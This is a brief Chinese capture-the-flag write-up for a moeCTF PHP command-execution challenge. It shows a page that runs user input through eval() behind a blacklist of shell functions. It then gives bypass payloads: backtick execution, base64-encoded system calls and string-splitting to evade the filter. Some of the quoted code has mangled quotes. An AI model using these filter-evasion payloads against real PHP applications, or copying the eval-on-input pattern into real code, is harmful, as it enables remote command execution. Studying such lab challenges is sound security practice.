moeCTF WriteUp之Dynamic–命令执行

一位表弟问我的题吧,题目名称不知道对不对,看他博客这样写的名称

题目:

<?php
highlight_file(__FILE__);
error_reporting(0);
$blacklist = ["system", "ini_set", "exec", "scandir", "shell_exec", "proc_open", "error_log", "ini_alter", "ini_set", "pfsockopen", "readfile", "echo", "file_get_contents", "readlink", "symlink", "popen", "fopen", "file", "fpassthru"];
$blacklist = array_merge($blacklist, get_defined_functions()['internal']);
foreach($blacklist as $i){
if(stristr($_GET[cmd], $i)!==false){
die('hack');
}
}
eval($_GET[cmd]);

过滤了:

<?php
highlight_file(__FILE__);
error_reporting(0);
$blacklist = ["system", "ini_set", "exec", "scandir", "shell_exec", "proc_open", "error_log", "ini_alter", "ini_set", "pfsockopen", "readfile", "echo", "file_get_contents", "readlink", "symlink", "popen", "fopen", "file", "fpassthru"];
$blacklist = array_merge($blacklist, get_defined_functions()['internal']);
foreach($blacklist as $i){
echo $i;
echo "\n";
}

解法:

1.反引号

·whoami·

2.base64编码解码

echo (base64_encode(“system(‘id’);”));
echo (base64_decode(‘c3lzdGVtKCdpZCcpOw==’));
eval(base64_decode(‘c3lzdGVtKCdpZCcpOw==’));

后来执行了题目发现,过滤的还有里面的里面函数

此法不通

3.变量拼凑

$a=”echo syste”;$b=”m(‘uname’);”;$c=$a.$b;
eval($c);

小表弟最后的解法,可行

2019.8.11